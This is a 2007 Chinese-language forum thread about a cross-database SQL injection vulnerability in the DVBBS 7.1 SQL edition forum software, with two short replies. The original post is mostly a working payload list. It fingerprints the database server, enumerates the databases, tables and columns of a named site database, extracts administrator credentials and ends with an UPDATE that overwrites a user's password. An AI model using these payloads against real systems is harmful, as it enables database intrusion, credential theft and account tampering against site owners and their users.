返回列表 发帖

主题
积分
贝壳
0 个 
性别
男 
来自
潇湘 
注册时间
2005-2-5 
最后登录
2010-1-6 

热情勋章勤劳勋章贡献勋章
楼主 跳转到 » 正序看帖
打印
tT
坏的刚刚好发表于 2007-3-19 16:12 | 只看该作者

[讨论] DVBBS7.1 SQL版 跨库漏洞

漏洞测试环境:DVBBS7.1 SQL

受影响文件
admin/admin.asp
.....

漏洞利用

(select @@version)>0 获得Windows的版本号
and user_name()=’dbo’ 判断当前系统的连接用户是不是sa
(select user_name())>0 爆当前系统的连接用户
(select db_name())>0 得到当前连接的数据库
(select IS_MEMBER(’db_owner’)) --查询数据库当前用户权限

(select count(*) from master.dbo.sysdatabases where name>1 and dbid=7) ---查询所有数据库名
(select top 1 name from JxSoufun.dbo.sysobjects where xtype=’U’) --查询数据库表名
(select top 1 name from JxSoufun.dbo.sysobjects where xtype=’U’ and name not in (’web_Admin’)) --查询数据库所有表名
(select count(*) from JxSoufun.dbo.sysobjects where xtype=’U’ and name=’web_Admin’ and uid>(str(id))) --查询表名ID
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048) --查询字段名
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048 and name not in(’adminname’)) --查询所有字段名
(select count(*) from JxSoufun.dbo.web_Admin where AdminName>1) -查询用户
(select count(*) from JxSoufun.dbo.web_Admin where Adminpwd>1 and username=’bluefire’) -查询用户bluefire密码
;update JxSoufun.dbo.Agency_User set userpwd=’965eb72c92a549dd’ where username=’mthfc’;--
收藏 分享
天行健,君子以自强不息
地势坤,君子以厚德载物
—————————————
海岸线欢迎您

主题
积分
贝壳
0 个 
注册时间
2005-9-3 
最后登录
2008-10-23 
板凳
青蛙发表于 2007-3-26 19:49 | 只看该作者
--!这都被你发现了~需要有部分权限才能利用漏洞吗?还是没任何限制?

TOP

主题
积分
贝壳
0 个 
注册时间
2004-4-1 
最后登录
2007-8-12 
沙发
demon发表于 2007-3-21 17:39 | 只看该作者
都看看!:)
共同进步
BLOG:http://demon.thysea.com

TOP

返回列表 回复 发帖